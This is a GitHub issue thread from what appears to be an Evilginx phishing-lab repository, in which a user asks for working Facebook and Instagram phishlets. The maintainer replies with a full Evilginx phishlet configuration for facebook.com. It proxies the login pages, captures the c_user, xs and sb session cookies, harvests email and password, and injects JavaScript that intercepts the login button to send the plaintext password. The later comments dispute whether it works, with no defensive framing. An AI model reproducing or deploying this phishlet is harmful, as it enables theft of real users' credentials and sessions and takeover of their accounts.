### ISSUE TITLE
Facebook phishlets doesn’t work

### ISSUE THREAD

**Issue by whithey79** [Evi1Grey5/Evilginx-3-PHISHLET-LAB#19]
Bro can you update the fb phishlets? It doesn’t work at all or maybe update Instagram phishlets too.

**Comment by Evi1Grey5** [comment]
![Screenshot_1](https://github.com/user-attachments/assets/78bef23c-dbf5-4f2a-b14a-7d364796f715)

**Comment by Evi1Grey5** [comment]
author: '@Evi1Grey5'
min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true, auto_filter: false}
  - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false, auto_filter: false}
sub_filters:
  - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}

auth_tokens:
  - domain: '.facebook.com'
    keys: ['c_user','xs','sb']

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'unenc_password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'www.facebook.com'
  path: '/login.php'

js_inject:
  - trigger_domains: ["www.facebook.com"]
    trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
    trigger_params: []
    script: |  
      function onclickListener(){
        var submit = document.querySelectorAll('button[type=submit]')[0];
        submit.setAttribute("onclick", "sendPass()");
        return;
      }
      function sendPass(){
        var password = document.getElementsByName("pass")[0].value;
        var xhr = new XMLHttpRequest();
        xhr.open("POST", '/login/device-based/regular/login/', true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("unenc_password="+encodeURIComponent(password));
        return;
      }
      setTimeout(function(){ onclickListener(); }, 1000);

**Comment by whithey79** [comment]
Glad you took your time to respond when I absolutely own you nothings but however, it didn’t work like the one in your screenshot. It seems to redirect to the original facebook url. Screenshot below 👇 

![IMG_3124](https://github.com/user-attachments/assets/b1da0713-e9bc-4d0e-8ec6-bb6f17be7349)

**Comment by whithey79** [comment]
And please if you can, share Instagram phishlets too.

**Comment by Evi1Grey5** [comment]
> Glad you took your time to respond when I absolutely own you nothings but however, it didn’t work like the one in your screenshot. It seems to redirect to the original facebook url. Screenshot below 👇
> 
> ![IMG_3124](https://private-user-images.githubusercontent.com/176628076/395722646-b1da0713-e9bc-4d0e-8ec6-bb6f17be7349.jpeg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzQxMzMzMjEsIm5iZiI6MTczNDEzMzAyMSwicGF0aCI6Ii8xNzY2MjgwNzYvMzk1NzIyNjQ2LWIxZGEwNzEzLWU5YmMtNGQwZS04ZWM2LWJiNmYxN2JlNzM0OS5qcGVnP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MTIxMyUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDEyMTNUMjMzNzAxWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9OGVmMzQxYzZmNTYwOWEzYTRhYmJhNmQ5YzIxMTczNDA2NmRmMGU2YWQ3ZjllNzZhMzEyMDZlN2E4NjYzMjdmZSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.r127kj4J6Q79L_9WFTAdocppsZr-SdL4wtZAci8PzlU)

Have you specified all your hosting settings correctly and does the certificate work ?

**Comment by whithey79** [comment]
I’m just testing it out locally and haven’t really deployed it on my vps. I did specify my hosting and also dns was setup correctly. But from what I can tell, it seems to be maybe Facebook did carry out some upgrade or I don’t really know. But if you can check if yours if it currently works.

**Comment by Evi1Grey5** [comment]
> I’m just testing it out locally and haven’t really deployed it on my vps. I did specify my hosting and also dns was setup correctly. But from what I can tell, it seems to be maybe Facebook did carry out some upgrade or I don’t really know. But if you can check if yours if it currently works.

This was verified a few hours after your request. It works great, no problem. I think the problem is on your side.

**Comment by whithey79** [comment]
Nope it didn’t work. The problem is not on my end but the phishlet. It didn’t work when I tested it locally and still doesn’t work when I deploy it to my vps. See for yourself with screenshot below. Truth is, nobody has been able to create a working fb/IG phishlets 👇👇👇
![Uploading IMG_3128.jpeg…]()

**Comment by whithey79** [comment]
![Uploading IMG_3129.jpeg…]()

**Comment by whithey79** [comment]
![IMG_3130](https://github.com/user-attachments/assets/e5eb7e55-82da-4d12-b39f-7908f031c7ab)

**Comment by whithey79** [comment]
Bro none of the phishlets posted here works🤦🏼‍♀️ just tested instagram and some others but nothing works. Shouldn’t upload something if it doesn’t work.

**Comment by Evi1Grey5** [comment]
> Bro none of the phishlets posted here works🤦🏼‍♀️ just tested instagram and some others but nothing works. Shouldn’t upload something if it doesn’t work.

It seems to me that this does not work, only for you 😂

**Comment by whithey79** [comment]
Nah bro. It just doesn’t work. Well, I’m not the only person who’ve complained about your fb phishlets not working. I can see other comments that also complained too. STOP POSTING SHITS THAT DON’T WORK. Prove me wrong then.
